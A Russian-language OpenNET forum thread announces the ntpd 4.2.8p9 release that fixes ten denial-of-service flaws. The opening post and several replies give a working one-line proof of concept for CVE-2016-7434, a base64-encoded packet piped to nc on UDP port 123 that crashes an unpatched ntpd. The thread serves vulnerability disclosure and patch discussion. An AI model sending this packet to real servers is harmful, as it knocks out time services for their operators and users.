The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]

форумы  помощь  поиск  регистрация  вход/выход  слежка  RSS
"Выпуск ntpd 4.2.8p9 с устранением уязвимостей "
Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Изначальное сообщение [ Отслеживать ]

"Выпуск ntpd 4.2.8p9 с устранением уязвимостей "  +/
Сообщение от opennews (ok) on 24-Ноя-16, 11:23 
Доступен (http://www.ntp.org/downloads.html) корректирующий выпуск сервера для синхронизации точного времени NTP 4.2.8p9, в котором устранено 10 уязвимостей (http://support.ntp.org/bin/view/Main/SecurityNotice#November...), которые могут привести к отказу в обслуживании, путём исчерпания доступных ресурсов или инициирования краха процесса. Одна из уязвимостей (http://bugs.ntp.org/show_bug.cgi?id=3082) (CVE-2016-7434) достаточно проста в эксплуатации (http://dumpco.re/cve-2016-7434/) и может привести к краху процесса ntpd при отправке специально оформленного пакета без необходимости прохождения аутентификации (проблема проявляется на ранней стадии соединения):

    echo "FgoAEAAAAAAAAAA2bm9uY2UsIGxhZGRyPVtdOkhyYWdzPTMyLCBsY"\
    "WRkcj1bXTpXT1AAMiwgbGFkZHI9W106V09QAAA=" | base64 -d | nc -u -v 127.0.0.1 123

URL: http://www.kb.cert.org/vuls/id/633847
Новость: http://www.opennet.me/opennews/art.shtml?num=45553

Ответить | Правка | Cообщить модератору

Оглавление

Сообщения по теме [Сортировка по времени | RSS]


1. "Выпуск ntpd 4.2.8p9 с устранением уязвимостей "  +2 +/
Сообщение от freehck email(ok) on 24-Ноя-16, 11:23 
При копировании команды имейте в виду, что на opennet отступы для блоков кода дополнительные ставятся, что приводит к появлению пробела посреди строки. ;)

echo "FgoAEAAAAAAAAAA2bm9uY2UsIGxhZGRyPVtdOkhyYWdzPTMyLCBsYWRkcj1bXTpXT1AAMiwgbGFkZHI9W106V09QAAA="

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

2. "Выпуск ntpd 4.2.8p9 с устранением уязвимостей "  +/
Сообщение от burik666 (ok) on 24-Ноя-16, 12:45 
echo "6nonce, laddr=[]:Hrags=32, laddr=[]:WOP2, laddr=[]:WOP"
Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

3. "Выпуск ntpd 4.2.8p9 с устранением уязвимостей "  +2 +/
Сообщение от wd on 24-Ноя-16, 13:33 
wd ~ % echo "FgoAEAAAAAAAAAA2bm9uY2UsIGxhZGRyPVtdOkhyYWdzPTMyLCBsYWRkcj1bXTpXT1AAMiwgbGFkZHI9W106V09QAAA=" |base64 -d |hexdump -C
00000000  16 0a 00 10 00 00 00 00  00 00 00 36 6e 6f 6e 63  |...........6nonc|
00000010  65 2c 20 6c 61 64 64 72  3d 5b 5d 3a 48 72 61 67  |e, laddr=[]:Hrag|
00000020  73 3d 33 32 2c 20 6c 61  64 64 72 3d 5b 5d 3a 57  |s=32, laddr=[]:W|
00000030  4f 50 00 32 2c 20 6c 61  64 64 72 3d 5b 5d 3a 57  |OP.2, laddr=[]:W|
00000040  4f 50 00 00                                       |OP..|
Ответить | Правка | ^ к родителю #2 | Наверх | Cообщить модератору

4. "Выпуск ntpd 4.2.8p9 с устранением уязвимостей "  +/
Сообщение от burik666 (ok) on 24-Ноя-16, 13:59 
точно! тупанул.
Ответить | Правка | ^ к родителю #3 | Наверх | Cообщить модератору

8. "Выпуск ntpd 4.2.8p9 с устранением уязвимостей "  –1 +/
Сообщение от pavlinux (ok) on 27-Ноя-16, 03:21 
> При копировании команды имейте в виду, что на opennet ...

UNIX-way - printf

printf "%q" "FgoAEAAAAAAAAAA2bm9uY2UsIGxhZGRyPVtdOkhyYWdzPTMyLCBsY"\
    "WRkcj1bXTpXT1AAMiwgbGFkZHI9W106V09QAAA=" | base64 -d | nc -u -v 127.0.0.1 123

Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

5. "Выпуск ntpd 4.2.8p9 с устранением уязвимостей "  +/
Сообщение от Аноним email(??) on 24-Ноя-16, 16:37 
в этот раз на слаке апдейт завезли быстро
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

6. "Выпуск ntpd 4.2.8p9 с устранением уязвимостей "  +3 +/
Сообщение от rt (??) on 24-Ноя-16, 22:35 
Потрясающе!
Ответить | Правка | ^ к родителю #5 | Наверх | Cообщить модератору

7. "Выпуск ntpd 4.2.8p9 с устранением уязвимостей "  –1 +/
Сообщение от Аноним (??) on 25-Ноя-16, 12:40 
Gentoo, ntp 4.2.8p8 - не крашится
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

9. "Выпуск ntpd 4.2.8p9 с устранением уязвимостей "  +/
Сообщение от SysA on 28-Ноя-16, 11:37 
К сожалению ты неправ!
Крашится, но v4.2.8_p9 - нет.
Ответить | Правка | ^ к родителю #7 | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру